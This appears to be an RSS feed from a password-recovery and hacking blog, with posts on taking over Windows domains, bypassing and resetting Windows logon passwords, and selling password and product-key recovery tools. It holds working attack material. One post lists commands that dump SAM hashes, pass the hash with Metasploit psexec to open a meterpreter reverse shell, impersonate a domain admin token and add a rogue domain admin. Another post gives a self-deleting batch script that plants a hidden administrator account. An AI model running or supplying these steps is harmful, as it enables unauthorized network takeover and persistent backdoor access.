<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>What&#039;s My Pass? &#187; Microsoft Vista</title>
	<atom:link href="http://www.whatsmypass.com/tag/microsoft-vista/feed" rel="self" type="application/rss+xml" />
	<link>http://www.whatsmypass.com</link>
	<description>Password Recovery for Windows, Mac, Linux, browsers, email, instant messengers, BIOS</description>
	<lastBuildDate>Tue, 24 Jan 2012 16:08:10 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>How to own a Windows Domain 2.0</title>
		<link>http://www.whatsmypass.com/how-to-own-a-windows-domain-2-0</link>
		<comments>http://www.whatsmypass.com/how-to-own-a-windows-domain-2-0#comments</comments>
		<pubDate>Sat, 20 Feb 2010 16:42:22 +0000</pubDate>
		<dc:creator>Dev Team</dc:creator>
				<category><![CDATA[Privilege Escalation]]></category>
		<category><![CDATA[windows]]></category>
		<category><![CDATA[Administrator]]></category>
		<category><![CDATA[Domain Admins]]></category>
		<category><![CDATA[domain server]]></category>
		<category><![CDATA[Microsoft Vista]]></category>
		<category><![CDATA[Microsoft Windows]]></category>
		<category><![CDATA[net]]></category>
		<category><![CDATA[Windows Server]]></category>

		<guid isPermaLink="false">http://www.whatsmypass.com/how-to-own-a-windows-domain-2-0</guid>
		<description><![CDATA[Back in October we showed you a video on how to own a Windows domain by passing the hash from the local admin account to the domain server to add a new domain admin account. This newer version makes the task much easier using Backtrack4 and metasploit. The commands used in the video: mount /dev/sda1 [...]]]></description>
			<content:encoded><![CDATA[<p>Back in October we showed you a <a href="http://www.whatsmypass.com/how-to-own-a-windows-domain">video</a> on how to own a Windows domain by passing the hash from the local admin account to the domain server to add a new domain admin account. This newer version makes the task much easier using Backtrack4 and metasploit.<br />
<center><br />
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="425" height="344" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" /><param name="allowScriptAccess" value="always" /><param name="src" value="http://www.youtube.com/v/fIQQD193Hvc&amp;color1=0xb1b1b1&amp;color2=0xcfcfcf&amp;hl=en_US&amp;feature=player_embedded&amp;fs=1" /><param name="allowfullscreen" value="true" /><embed type="application/x-shockwave-flash" width="425" height="344" src="http://www.youtube.com/v/fIQQD193Hvc&amp;color1=0xb1b1b1&amp;color2=0xcfcfcf&amp;hl=en_US&amp;feature=player_embedded&amp;fs=1" allowscriptaccess="always" allowfullscreen="true"></embed></object></center><br />
<span id="more-861"></span><br />
<code><br />
The commands used in the video:</p>
<p>mount /dev/sda1 /mnt/sda1<br />
cd /mnt/sda1/WINDOWS/system32/config<br />
samdump2 system SAM<br />
msfconsole<br />
use windows/smb/psexec<br />
exploit -p windows/meterpreter/reverse_tcp -o LHOST=192.168.1.160,LPORT=6789,RHOST=192.168.1.23,SMBUser=Administrator,SMBPass= 123...:5654... -j<br />
sessions -i 1<br />
use incognito<br />
list_tokens -u<br />
impersonate_token mydomain\\domainadmin<br />
execute -f cmd.exe -i -t<br />
net user hack MPass5678 /add /domain<br />
net group "Domain Admins" hack /add /domain<br />
PWNED <img src='http://www.whatsmypass.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /><br />
</code><br />
Lessons learned :<br />
1. never reuse admin passwords, even if they are technically unbreakable<br />
2. everything is a lot easier with the right tools.</p>
<p>Attack is compatible with WinXP/Vista/Win7/Windows Server2k3/Windows Server 2k7</p>
]]></content:encoded>
			<wfw:commentRss>http://www.whatsmypass.com/how-to-own-a-windows-domain-2-0/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>GetKey 3.0</title>
		<link>http://www.whatsmypass.com/getkey-3-0</link>
		<comments>http://www.whatsmypass.com/getkey-3-0#comments</comments>
		<pubDate>Sun, 13 Sep 2009 02:57:43 +0000</pubDate>
		<dc:creator>Dev Team</dc:creator>
				<category><![CDATA[Our Tools]]></category>
		<category><![CDATA[windows]]></category>
		<category><![CDATA[Channel]]></category>
		<category><![CDATA[getkey]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[Microsoft Vista]]></category>
		<category><![CDATA[Microsoft Windows]]></category>
		<category><![CDATA[mpc]]></category>
		<category><![CDATA[office key]]></category>
		<category><![CDATA[operating system]]></category>
		<category><![CDATA[RAM]]></category>
		<category><![CDATA[Software Requirements        Processor]]></category>
		<category><![CDATA[USD]]></category>
		<category><![CDATA[Windows 98]]></category>
		<category><![CDATA[windows key]]></category>
		<category><![CDATA[xp]]></category>

		<guid isPermaLink="false">http://www.whatsmypass.com/?p=745</guid>
		<description><![CDATA[GetKey 3.0 easily recovers Windows and Microsoft Office Product Keys. It also can recover the keys from a slaved/offline drive or run from a WindowsPE CD,such as BartsPE or Hiren&#8217;s BootDisk! It even decodes what type of Windows is installed on the offline drive by decoding the Microsoft Product Code and Channel ID, so if [...]]]></description>
			<content:encoded><![CDATA[<p>GetKey 3.0 easily recovers Windows and Microsoft Office Product Keys. It also can recover the keys from a slaved/offline drive or run from a WindowsPE CD,such as BartsPE or Hiren&#8217;s BootDisk!  It even decodes what type of Windows is installed on the offline drive by decoding the Microsoft Product Code and Channel ID, so if you have you&#8217;re a tech working on a dead system you can grab the right Windows CD to install. GetKey is written in pure assembly language, it&#8217;s fully portable and is only 14kb in size .<center></p>
<p style="text-align: center;">
<img src="http://www.whatsmypass.com/wp-content/uploads/2009/09/1.png" alt="1" title="1" width="375" height="256" class="aligncenter size-full wp-image-746" /><br />
<img src="http://www.whatsmypass.com/wp-content/uploads/2009/09/2.png" alt="2" title="2" width="375" height="256" class="aligncenter size-full wp-image-747" /></center></p>
<p><strong>Software Requirements</strong></p>
<ul>
<li>Processor: Pentium class or equivalent processor</li>
<li>RAM: 64MB RAM recommended</li>
<li>Hard Disk: 14kb free hard disk space</li>
<li>Supported Operating System: Windows 98/ME/NT/2000/2003/XP/Vista/Win7 *32bit only!</li>
</ul>
<p style="text-align: center;"><strong><em>We are offering this for only Only $4.99!! All proceeds go to supporting this site!</em></strong></p>
<table style="height: 75px;" border="0" width="463">
<tbody>
<tr>
<td>
<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="hidden" name="cmd" value="_s-xclick">
<input type="hidden" name="hosted_button_id" value="2T467F8XKKAKG">
<input type="image" src="https://www.paypal.com/en_US/i/btn/btn_buynowCC_LG.gif" border="0" name="submit" alt="PayPal - The safer, easier way to pay online!">
<img alt="" border="0" src="https://www.paypal.com/en_US/i/scr/pixel.gif" width="1" height="1"><br />
</form>
</td>
<td style="text-align: center;" valign="top"><a href="http://1626765-USD4.99.e-gold.com" target="_top"><img src="http://www.e-gold.com/gif/paywith.gif" border="0" alt="Pay Now with e-gold..." /></a></td>
</tr>
</tbody>
</table>
<p style="text-align: left;">
]]></content:encoded>
			<wfw:commentRss>http://www.whatsmypass.com/getkey-3-0/feed</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>Bypass Windows Logon Password</title>
		<link>http://www.whatsmypass.com/bypass-windows-logon-password</link>
		<comments>http://www.whatsmypass.com/bypass-windows-logon-password#comments</comments>
		<pubDate>Thu, 23 Apr 2009 22:22:29 +0000</pubDate>
		<dc:creator>Dev Team</dc:creator>
				<category><![CDATA[Privilege Escalation]]></category>
		<category><![CDATA[windows]]></category>
		<category><![CDATA[bypass]]></category>
		<category><![CDATA[Fedora]]></category>
		<category><![CDATA[Gentoo]]></category>
		<category><![CDATA[i-mate SP3 Cell Phone]]></category>
		<category><![CDATA[kon-boot]]></category>
		<category><![CDATA[konboot]]></category>
		<category><![CDATA[KryptosLogic]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Linux system]]></category>
		<category><![CDATA[login]]></category>
		<category><![CDATA[Microsoft Vista]]></category>
		<category><![CDATA[Microsoft Windows]]></category>
		<category><![CDATA[SP2]]></category>
		<category><![CDATA[Ubuntu]]></category>
		<category><![CDATA[VXI Corporation TalkPro SP1 Headset]]></category>
		<category><![CDATA[Windows 7]]></category>
		<category><![CDATA[xp]]></category>

		<guid isPermaLink="false">http://www.whatsmypass.com/?p=604</guid>
		<description><![CDATA[Accessing a Windows computer without knowing the password is fairly simple with this free tool called Kon-Boot .There are alternatives like Ophcrack etc, but those rely on grabbing the SAM hashes and cracking those. What sets Kon-Boot apart is that is modifies the kernel on-the-fly while booting (everything is done virtually &#8211; without any interferences [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><img class="size-full wp-image-605 alignnone" title="konboot-300x111" src="http://www.whatsmypass.com/wp-content/uploads/2009/04/konboot-300x111.jpg" alt="" width="300" height="111" /></p>
<p>Accessing a Windows computer without knowing the password is fairly simple with this free tool called Kon-Boot .There are alternatives like Ophcrack etc, but those rely on grabbing the SAM hashes and cracking those. What sets Kon-Boot apart is that is modifies the kernel on-the-fly while booting (everything is done virtually &#8211; without any interferences with physical system changes) and allows you to log into any account without entering a password. All you have to do is insert a boot (cd or floppy) disk burned with Kon-boot software(110kb) in to the computer and boot up.<br />
<span id="more-604"></span><br />
<a href="http://www.whatsmypass.com/wp-content/uploads/2009/04/konboot.png"><img class="aligncenter size-medium wp-image-606" title="konboot" src="http://www.whatsmypass.com/wp-content/uploads/2009/04/konboot.png" alt="" width="490" height="317" /></a><br />
Kon-boot which was initially started as a small project for Linux (mainly Ubuntu),where it allows to log into a Linux system as ‘root’ user without typing the correct password or to elevate privileges from current user to root. Now it was moved to windows platform where it enables Windows users to login to any password protected machine profile without any knowledge of the password.<br />
This program works with the following versions of Windows: XP (SP1, SP2, SP3), Vista (Business, Ultimate), 2000, Server 2003 and 2008, and Windows 7. Kon-Boot also allows you to boot Linux (distributions: Ubuntu, Gentoo, Debian and Fedora) without a password as well.</p>
<p style="text-align: center;"><a href="http://www.piotrbania.com/all/kon-boot/">http://www.piotrbania.com/all/kon-boot/</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.whatsmypass.com/bypass-windows-logon-password/feed</wfw:commentRss>
		<slash:comments>10</slash:comments>
		</item>
		<item>
		<title>GetKey 1.0</title>
		<link>http://www.whatsmypass.com/getkey-10</link>
		<comments>http://www.whatsmypass.com/getkey-10#comments</comments>
		<pubDate>Fri, 27 Mar 2009 17:30:12 +0000</pubDate>
		<dc:creator>Dev Team</dc:creator>
				<category><![CDATA[Our Tools]]></category>
		<category><![CDATA[windows]]></category>
		<category><![CDATA[Microsoft Vista]]></category>
		<category><![CDATA[Microsoft Windows]]></category>
		<category><![CDATA[Windows 95]]></category>
		<category><![CDATA[xp]]></category>

		<guid isPermaLink="false">http://www.whatsmypass.com/?p=533</guid>
		<description><![CDATA[Added GetKey 1.0 to the freeware section, it retrieves your Product Key (cd key) used to install Windows. For Windows 95, 98, ME, 2000, XP, Vista, Server 2003, Server 2008]]></description>
			<content:encoded><![CDATA[<p>Added GetKey 1.0 to the <a href="http://www.whatsmypass.com/?page_id=143">freeware section</a>, it retrieves your Product Key (cd key) used to install Windows. For Windows 95, 98, ME, 2000, XP, Vista, Server 2003, Server 2008</p>
]]></content:encoded>
			<wfw:commentRss>http://www.whatsmypass.com/getkey-10/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Trillian Recover</title>
		<link>http://www.whatsmypass.com/trillian-recover</link>
		<comments>http://www.whatsmypass.com/trillian-recover#comments</comments>
		<pubDate>Fri, 27 Mar 2009 15:49:31 +0000</pubDate>
		<dc:creator>Dev Team</dc:creator>
				<category><![CDATA[Our Tools]]></category>
		<category><![CDATA[Trillian]]></category>
		<category><![CDATA[equivalent processor]]></category>
		<category><![CDATA[Microsoft Vista]]></category>
		<category><![CDATA[operating system]]></category>
		<category><![CDATA[RAM]]></category>
		<category><![CDATA[Trillian Messenger]]></category>
		<category><![CDATA[Trillian Password Recovery Software]]></category>
		<category><![CDATA[USD]]></category>
		<category><![CDATA[Windows 98]]></category>
		<category><![CDATA[xp]]></category>

		<guid isPermaLink="false">http://www.whatsmypass.com/?p=529</guid>
		<description><![CDATA[Trillian Password Recovery Software easily recovers and exposes all lost or forgotten AIM saved passwords. Easily retrieves password information instantly regardless of the password length and complexity with full support to all Trillian versions. Trillian Recover is written in pure assembly language. More information on how the password is stored ::here:: Software Requirements Processor: Pentium [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><img class="alignnone size-full wp-image-530" title="trillian" src="http://www.whatsmypass.com/wp-content/uploads/2009/03/trillian.png" alt="" width="300" height="300" /></p>
<p>Trillian Password Recovery Software easily recovers and exposes all lost or forgotten AIM saved passwords.  Easily retrieves password information instantly regardless of the password length and complexity with full support to all Trillian versions. Trillian Recover is written in pure assembly language.</p>
<p>More information on how the password is stored <a href="http://www.whatsmypass.com/?p=15#more-15">::here::</a></p>
<p><strong>Software Requirements</strong></p>
<ul>
<li>Processor: Pentium class or equivalent processor</li>
<li>RAM: 64MB RAM recommended</li>
<li>Hard Disk: 5kb free hard disk space</li>
<li>Supported Operating System: Windows 98/ ME/ NT/ 2000/ 2003/ XP/ Vista /Win7</li>
</ul>
<p><strong>Trial and registration</strong></p>
<p align="justify">Evaluation version is available for FREE download. This unregistered (demo) software recovers only the first 3 characters in password (rest is shown as ‘*’).</p>
<p><center><br />
Download Trillian Recover Demo<br />
<a href="http://www.whatsmypass.com/downloads/TrillianRecover"><img src="http://whatsmypass.com/download.jpg"></a><br />
1198 downloads</center></p>
<p style="text-align: center;"><strong><em>In order to display full Password you should register for licensed Software.<br />
Only $4.99!! All proceeds go to supporting this site!</em></strong></p>
<h2>
<a href="http://www.whatsmypass.com/trillian-recover-1-1">** Newer Version Released Click HERE**</a><br />
</h2>
<p></center></p>
]]></content:encoded>
			<wfw:commentRss>http://www.whatsmypass.com/trillian-recover/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>AIM Recover</title>
		<link>http://www.whatsmypass.com/aim-recover</link>
		<comments>http://www.whatsmypass.com/aim-recover#comments</comments>
		<pubDate>Fri, 27 Mar 2009 04:20:29 +0000</pubDate>
		<dc:creator>Dev Team</dc:creator>
				<category><![CDATA[AIM]]></category>
		<category><![CDATA[Files]]></category>
		<category><![CDATA[Our Tools]]></category>
		<category><![CDATA[2 algorithms]]></category>
		<category><![CDATA[America Online]]></category>
		<category><![CDATA[AOL Instant Messenger Password Recovery Software]]></category>
		<category><![CDATA[Blowfish algorithm]]></category>
		<category><![CDATA[decrypt]]></category>
		<category><![CDATA[equivalent processor]]></category>
		<category><![CDATA[Microsoft Vista]]></category>
		<category><![CDATA[operating system]]></category>
		<category><![CDATA[passwords]]></category>
		<category><![CDATA[RAM]]></category>
		<category><![CDATA[USD]]></category>
		<category><![CDATA[Windows 98]]></category>
		<category><![CDATA[xp]]></category>

		<guid isPermaLink="false">http://www.whatsmypass.com/?p=516</guid>
		<description><![CDATA[AOL Instant Messenger Password Recovery Software easily recovers and exposes all lost or forgotten AIM saved passwords. Easily retrieves password information instantly regardless of the password length and complexity with full support to all AIM 6.x versions. AIM Recover is written in pure assembly language. AIM 6.x (6.5 &#38; beta 6.8) uses 2 algorithms to [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><img class="alignnone size-full wp-image-517" title="aim" src="http://www.whatsmypass.com/wp-content/uploads/2009/03/aim.png" alt="" width="300" height="300" /></p>
<p>AOL Instant Messenger Password Recovery Software easily recovers and exposes all lost or forgotten AIM saved passwords.  Easily retrieves password information instantly regardless of the password length and complexity with full support to all AIM 6.x versions. AIM Recover is written in pure assembly language.</p>
<p>AIM 6.x (6.5 &amp; beta 6.8) uses 2 algorithms to encrypt your AIM password. First the Blowfish algorithm is used to encrypt the AIM password using a 448 bit keyword.<br />
The encrypted string is then encoded using base64 and stored in the registry at:<br />
\\HKEY_CURRENT_USER\Software\America Online\AIM6\Passwords</p>
<p><strong>Software Requirements</strong></p>
<ul>
<li>Processor: Pentium class or equivalent processor</li>
<li>RAM: 64MB RAM recommended</li>
<li>Hard Disk: 15kb free hard disk space</li>
<li>Supported Operating System: Windows 98/ ME/ NT/ 2000/ 2003/ XP/ Vista /Win7</li>
</ul>
<p><strong>Trial and registration</strong></p>
<p align="justify">Evaluation version is available for FREE download. This unregistered (demo) software recovers only the first 3 characters in password (rest is shown as ‘*’).</p>
<p><center><br />
Download Aim Recover Demo<br />
<a href="http://www.whatsmypass.com/downloads/AimRecover"><img src="http://whatsmypass.com/download.jpg"></a><br />
975 downloads</center></p>
<p style="text-align: center;"><strong><em>In order to display full Password you should register for licensed Software.<br />
Only $4.99!! All proceeds go to supporting this site!</em></strong></p>
<table style="height: 75px;" border="0" width="463">
<tbody>
<tr>
<td style="text-align: center;" valign="top"><a href="http://1626765-USD4.99.e-gold.com" target="_top"><img src="http://www.e-gold.com/gif/paywith.gif" border="0" alt="Pay Now with e-gold..." /></a></td>
<td>
<form style="text-align: center;" action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input alt="PayPal - The safer, easier way to pay online!" name="submit" src="https://www.paypal.com/en_US/i/btn/x-click-but06.gif" type="image" /> <img src="https://www.paypal.com/en_US/i/scr/pixel.gif" border="0" alt="" width="1" height="1" /></p>
<input name="cmd" type="hidden" value="_xclick-subscriptions" />
<input name="business" type="hidden" value="sales@whatsmypass.com" />
<input name="item_name" type="hidden" value="Aim View 1.0" />
<input name="no_shipping" type="hidden" value="1" />
<input name="no_note" type="hidden" value="1" />
<input name="currency_code" type="hidden" value="USD" />
<input name="lc" type="hidden" value="US" />
<input name="bn" type="hidden" value="PP-SubscriptionsBF" />
<input name="a3" type="hidden" value="4.99" />
<input name="p3" type="hidden" value="1" />
<input name="t3" type="hidden" value="Y" />
<input name="sra" type="hidden" value="1" /> </form>
</td>
</tr>
</tbody>
</table>
]]></content:encoded>
			<wfw:commentRss>http://www.whatsmypass.com/aim-recover/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Change Vista Password From Install DVD</title>
		<link>http://www.whatsmypass.com/change-vista-password-from-install-dvd</link>
		<comments>http://www.whatsmypass.com/change-vista-password-from-install-dvd#comments</comments>
		<pubDate>Sat, 14 Feb 2009 21:51:50 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[News]]></category>
		<category><![CDATA[Password Info]]></category>
		<category><![CDATA[windows]]></category>
		<category><![CDATA[Administrator]]></category>
		<category><![CDATA[forgotten Vista  Administrator]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[Microsoft Vista]]></category>
		<category><![CDATA[Microsoft Windows]]></category>
		<category><![CDATA[Password]]></category>
		<category><![CDATA[setup media]]></category>
		<category><![CDATA[vista]]></category>
		<category><![CDATA[vista dvd]]></category>
		<category><![CDATA[vista hack]]></category>
		<category><![CDATA[Windows Vista]]></category>
		<category><![CDATA[Windows Vista  Administrator]]></category>
		<category><![CDATA[Windows XP]]></category>

		<guid isPermaLink="false">http://www.whatsmypass.com/?p=469</guid>
		<description><![CDATA[Please take note that this handy tip is intended to recover/regain a forgotten Vista Administrator password. It is not intended to illegally hacking into a Vista system that&#8217;s not owning by users who refer this guide!! It is also intended to inform Vista users about the method by which anyone can access their private accounts [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><img class="aligncenter" src="http://3.bp.blogspot.com/_tqdukxIfRPQ/SY29rWTas0I/AAAAAAAABR8/3918DZi4_Ss/s400/Hack-Windows-Vista-in-Reduced-Functionality-Mode-2.png" alt="" /><br />
<span style="color: #000000;"><span>Please take note that this handy tip is intended to recover/regain a forgotten Vista <span style="color: #000000; font-size: 12px; font-weight: 400; font-style: normal; font-family: Arial,Helvetica,sans-serif; text-decoration: underline;">Administrator password</span>. It is not intended to illegally hacking into a Vista system that&#8217;s not owning by users who refer this guide!!</span></span> <span style="color: #000000;">It is also intended to inform Vista users about the method by which anyone can access their private accounts by cracking passwords&#8230;.Thus anyone can hack into administrator account and bypass guest user restrictions&#8230;.</span> <span style="color: #000000;">Lets start&#8230;</span> <strong style="color: #000000;"><span>Steps to hack <span style="color: #000000; font-size: 12px; font-style: normal; font-family: Arial,Helvetica,sans-serif; text-decoration: underline;">Windows Vista</span> Administrator account password:</span></strong><span id="more-469"></span></p>
<p><span>1. Reboot the <span class="IL_SPAN"><br />
<input name="IL_MARKER" type="hidden" />Windows Vista</span> and boot up with <span class="IL_SPAN"><br />
<input name="IL_MARKER" type="hidden" />Windows Vista</span> installation DVD.</span> <span style="color: #000000;"><span>Crack <span class="IL_SPAN"><br />
<input name="IL_MARKER" type="hidden" />Windows Vista</span> logon account password in minute with the <span class="IL_SPAN"><br />
<input name="IL_MARKER" type="hidden" />Windows Vista</span> installation DVD. Click on the Repair Your Computer </span></span><span style="color: #000000;"><span> <span style="color: #000000; font-size: 12px; font-weight: 400; font-style: normal; font-family: Arial,Helvetica,sans-serif; text-decoration: underline;">option</span>, bring up Command Prompt to open Local Users and Groups management in MMC.</span></span></p>
<p><span>2. While the <span class="IL_SPAN"><br />
<input name="IL_MARKER" type="hidden" />Windows Vista</span> installation interface pops up, click the Repair You Computer link at the bottom-left corner.</span></p>
<p><span class="fullpost" style="color: #000000;"><span>3. Next, the System Recovery Options dialog box appears. There are few options that related to repairing <span class="IL_SPAN"><br />
<input name="IL_MARKER" type="hidden" />Windows Vista</span>, looks like Recovery Console in Windows XP:</span></span></p>
<p><span class="fullpost" style="color: #000000;"><strong>Startup Repair options</strong><span> is used to automatically fix problems that are preventing <span class="IL_SPAN"><br />
<input name="IL_MARKER" type="hidden" />Windows Vista</span> from starting.</span></span></p>
<p><span class="fullpost" style="color: #000000;"><strong>System Restore</strong><span> to restore <span class="IL_SPAN"><br />
<input name="IL_MARKER" type="hidden" />Windows Vista</span> setting to an earlier point in time.</span></span></p>
<p><span class="fullpost" style="color: #000000;"><strong>Windows Complete PC Restore</strong><span> to restore <span class="IL_SPAN"><br />
<input name="IL_MARKER" type="hidden" />Windows Vista</span> from a full system backup.</span></span></p>
<p><span class="fullpost" style="color: #000000;"><strong><span><span style="color: #000000; font-size: 12px; font-style: normal; font-family: Arial,Helvetica,sans-serif; text-decoration: underline;">Windows Memory Diagnostic</span> Tool</span></strong> could be the first Microsoft memory tester toolkit that bundled with Windows setup media.</span></p>
<p><span class="fullpost" style="color: #000000;"><span>Command Prompt is the target <span class="IL_SPAN"><br />
<input name="IL_MARKER" type="hidden" />option</span> of this Vista hacking guide. Click on this <span class="IL_SPAN"><br />
<input name="IL_MARKER" type="hidden" />option</span> now.</span></span></p>
<p><span class="fullpost" style="color: #000000;"><span>4. In the <span class="IL_SPAN"><br />
<input name="IL_MARKER" type="hidden" />Windows Vista</span><span> Command Prompt, type mmc.exe and press ENTER key to bring up the <span style="color: #000000; font-size: 12px; font-weight: 400; font-style: normal; font-family: Arial,Helvetica,sans-serif; text-decoration: underline;">Microsoft Management Console</span>.</span></span></span></p>
<p><span class="fullpost" style="color: #000000;"><span>5. Click on the File menu, select Add / Remove Snap-in <span class="IL_SPAN"><br />
<input name="IL_MARKER" type="hidden" />option</span>, locate and select the Local Users and Groups on the left panel, and click Add button to add it to the right panel.</span></span></p>
<p><span class="fullpost" style="color: #000000;">6. Now, the Choose Target Machine dialog box pop up. Keep the default setting by clicking the Finish button – that means using the Local Users and Groups snap-in to manage this local computer, and not another computer in network.</span></p>
<p><span class="fullpost" style="color: #000000;">7. Click OK button and return to MMC windows. Under the Root Console in left panel, double-click Local Users and Group that was added earlier. Click on User folder, locate and right-click the target Vista logon account that found in the right panel.</span></p>
<p><span class="fullpost" style="color: #000000;">Select the Set Password from the right-click menu to set a new password / reset old password.</span></p>
<p>Src: <a href="http://techol.blogspot.com/2009/02/hack-windows-vista-administrator.html">Techol</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.whatsmypass.com/change-vista-password-from-install-dvd/feed</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>Recover wireless network keys from external drive</title>
		<link>http://www.whatsmypass.com/recover-wireless-network-keys-from-external-drive</link>
		<comments>http://www.whatsmypass.com/recover-wireless-network-keys-from-external-drive#comments</comments>
		<pubDate>Tue, 23 Dec 2008 05:56:05 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[Microsoft Vista]]></category>
		<category><![CDATA[operating system]]></category>
		<category><![CDATA[Windows XP]]></category>
		<category><![CDATA[wireless network keys;]]></category>

		<guid isPermaLink="false">http://www.whatsmypass.com/?p=426</guid>
		<description><![CDATA[The new version of WirelessKeyView from Nirsoft now allows you to recover your wireless network keys from external instance of Windows XP operating system (Vista is not supported yet). This feature can be useful if you have a dead system that cannot boot anymore.]]></description>
			<content:encoded><![CDATA[<p>The new version of <a href="http://www.nirsoft.net/utils/wirelesskeyview.zip">WirelessKeyView</a> from Nirsoft now allows you to recover your wireless network keys from external instance of Windows XP operating system (Vista is not supported yet). This feature can be useful if you have a dead system that cannot boot anymore.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.whatsmypass.com/recover-wireless-network-keys-from-external-drive/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Create A Hidden User on XP/VISTA</title>
		<link>http://www.whatsmypass.com/create-a-hidden-user-on-xpvista</link>
		<comments>http://www.whatsmypass.com/create-a-hidden-user-on-xpvista#comments</comments>
		<pubDate>Sat, 11 Oct 2008 10:32:07 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Password Info]]></category>
		<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[windows]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[Microsoft Vista]]></category>
		<category><![CDATA[Windows NT]]></category>
		<category><![CDATA[xp]]></category>

		<guid isPermaLink="false">http://www.whatsmypass.com/?p=303</guid>
		<description><![CDATA[Nice little .bat script trick from illwill @ illmob.org that will create user who&#8217;s account will be hidden from the logon screen and the User Accounts screen in control panel. This will only work if its ran from an account that has admin rights. It&#8217;s great for a backup account. @echo off rem HideUser.bat rem [...]]]></description>
			<content:encoded><![CDATA[<p>Nice little .bat script trick from illwill @ illmob.org that will create user who&#8217;s account will be hidden from the logon screen and the User Accounts screen in control panel. This will only work if its ran from an account that has admin rights. It&#8217;s great for a backup account.</p>
<pre>
@echo off
rem HideUser.bat
rem by illwill    http://illmob.org
rem This will create a hidden user with admin rights in XP/Vista
rem ( hidden meaning that the username wont appear in the logon screen)
rem change the illwill &#038; passw0rd to your own
rem Add once you log into your new account dont forget to hide the user folder
rem "attrib +r +a +s +h %USERPROFILE%"

SET NEWUSER=adm1n
SET PASS=passw0rd

net user %NEWUSER% %PASS% /add &#038;&#038; net localgroup administrators %NEWUSER% /add>nul 2>&#038;1
reg.exe ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v %NEWUSER% /t REG_DWORD /d 0 /f>nul 2>&#038;1
DEL %0
</pre>
]]></content:encoded>
			<wfw:commentRss>http://www.whatsmypass.com/create-a-hidden-user-on-xpvista/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Logon Automatically and lock computer</title>
		<link>http://www.whatsmypass.com/logon-automatically-and-lock-computer</link>
		<comments>http://www.whatsmypass.com/logon-automatically-and-lock-computer#comments</comments>
		<pubDate>Sat, 11 Oct 2008 09:31:15 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[News]]></category>
		<category><![CDATA[Password Info]]></category>
		<category><![CDATA[windows]]></category>
		<category><![CDATA[Microsoft Vista]]></category>
		<category><![CDATA[Microsoft Windows]]></category>
		<category><![CDATA[search field]]></category>
		<category><![CDATA[Tweak UI]]></category>
		<category><![CDATA[USD]]></category>
		<category><![CDATA[Windows XP]]></category>

		<guid isPermaLink="false">http://www.whatsmypass.com/?p=300</guid>
		<description><![CDATA[So your the only user on your computer and you want to have the security of your own password, but you don’t want to have to wait for all your startup programs to launch when you first boot up. You wish there was just some way to have your computer startup, load all your programs, [...]]]></description>
			<content:encoded><![CDATA[<p>So your the only user on your computer and you want to have the security of your own password, but you don’t want to have to wait for all your startup programs to launch when you first boot up. You wish there was just some way to have your computer startup, load all your programs, but be secure so that it does it all in the background of the login screen and you don’t have to wait for it.</p>
<p>Paying something like $50 for a program such as Tweak UI is just out of the question, wouldn’t you agree? Well, luckily for you, you can do this for free! Just follow the next couple of steps in this post and you will have your dream in no time.<br />
<span id="more-300"></span></p>
<p>Lets get started!</p>
<h3>Step 1:</h3>
<p>Go to your desktop and right-click any where that has no file, so that it brings up the default right-click menu.</p>
<p>Select “<em>New</em>” from the menu, then select “<em>Shortcut</em>“. “<em>Shortcut</em>” is located just under “<em>Folder</em>“.</p>
<div id="attachment_22" class="wp-caption alignnone" style="width: 310px;"><a href="http://www.bestcomputersolution.com/blog/wp-content/uploads/2008/10/31.jpg"><img class="size-medium wp-image-22" title="Step 1" src="http://www.bestcomputersolution.com/blog/wp-content/uploads/2008/10/31-300x160.jpg" alt="Step 3" width="300" height="160" /></a></p>
<p class="wp-caption-text">Step 1</p>
</div>
<h3>Step 2:</h3>
<p>Windows will now ask you to specify the location for the shortcut.</p>
